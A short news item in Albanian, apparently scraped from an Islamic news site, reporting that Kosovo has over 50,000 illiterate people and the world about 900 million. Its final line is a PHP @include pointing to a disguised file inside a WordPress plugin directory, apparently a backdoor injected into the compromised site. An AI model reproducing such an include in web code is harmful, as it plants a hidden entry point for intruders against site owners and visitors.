Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Kosova me 50 mijë analfabetë klasikë

Kosova me 50 mijë analfabetë klasikë

Kosova me 50 mijë analfabetë klasikë

Përderisa sot më shumë se kurr më herët egzistojnë shkolla që nga nivelet më të ulta e deri ne nivelet më të larta, prap se prap dalin statistika marramendëse të analfabetizmit në mbarë botën dhe gjithashtu në vendin tonë.

Të dhënat tregojnë se në botë janë rreth 900 milionë analfabetë – shumica e tyre gra dhe fëmijë.

Në Kosovë, sipas regjistrimit të fundit, jetojnë mbi 50,000 analfabetë klasikë./kohaislame/

@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";